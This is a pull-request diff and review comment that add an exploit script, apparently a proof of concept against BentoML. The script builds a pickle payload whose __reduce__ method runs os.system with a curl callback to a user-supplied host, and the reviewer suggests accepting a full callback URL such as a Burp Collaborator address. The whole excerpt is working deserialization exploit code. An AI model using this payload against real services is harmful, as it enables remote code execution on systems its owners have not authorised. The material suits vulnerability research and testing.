bentoml/exploit.py

```diff
@@ -0,0 +1,10 @@
+import pickle, os, requests
+
+ip_address = input("give me your IP address which is accessible by the docker instances:\n")
+print(f"curl {ip_address}:1337")
+class P(object):
+    def __reduce__(self):
+        return (os.system, (f"curl {ip_address}:1337",))
```

Comment:
```suggestion
url = input("Please specify the URL that will receive the callback: ")
print(f"curl {url}")
class P(object):
    def __reduce__(self):
        return (os.system, (f"curl {url}",))
```
I think it's better to let the user choose the full URL to receive the callback on, so that they can use an external service such as Burp Collaborator for this